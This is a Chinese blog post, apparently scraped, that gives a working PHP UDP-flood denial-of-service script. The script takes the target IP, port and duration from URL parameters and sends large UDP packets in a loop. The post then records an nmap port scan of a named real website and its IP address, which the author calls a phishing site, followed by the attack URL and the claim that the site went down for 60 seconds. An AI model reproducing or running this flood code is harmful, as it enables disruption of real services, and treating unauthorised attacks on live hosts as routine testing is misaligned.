UDP FLOOD【PHP】

来源:互联网 发布:跟聪明的女朋友知乎 编辑:程序博客网 时间:2024/05/16 07:42
test.php

参考网上php 代码所修改

<?php  $packets = 0;  $ip = $_GET["ip"];  $rand = $_GET["port"];  set_time_limit(0);  ignore_user_abort(FALSE);  $exec_time = $_GET["time"];  $time = time();  print "Flooded: $ip on port $rand <br><br>";  $max_time = $time+$exec_time;  for($i=0;$i<65535;$i++){  $out .= "X";  }  while(1){  $packets++;  if(time() > $max_time){  break;  }  $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);  if($fp){  fwrite($fp, $out);  fclose($fp);  }     } 

测试目标:http://zzqgx.com/   (一个钓鱼网站)
目标信息:
PING zzqgx.com (118.193.197.40): 56 data bytes


64 bytes from 118.193.197.40: icmp_seq=0 ttl=105 time=99.915 ms


sudo nmap -sS 118.193.197.40


Starting Nmap 7.12 ( https://nmap.org ) at 2016-09-25 17:24 CST


Nmap scan report for 118.193.197.40


Host is up (0.083s latency).


Not shown: 987 closed ports


PORT     STATE    SERVICE


19/tcp   filtered chargen


80/tcp   open     http


135/tcp  filtered msrpc


139/tcp  filtered netbios-ssn


445/tcp  filtered microsoft-ds


593/tcp  filtered http-rpc-epmap


1025/tcp filtered NFS-or-IIS


1026/tcp open     LSA-or-nterm


1900/tcp filtered upnp


2301/tcp open     compaqdiag


3389/tcp open     ms-wbt-server


4444/tcp filtered krb524


6129/tcp filtered unknown




阻塞80端口


本地测试:
http://***/test.php?ip=118.193.197.40&port=80&time=60
target down!
60秒内此网页无法加载



1 0
原创粉丝点击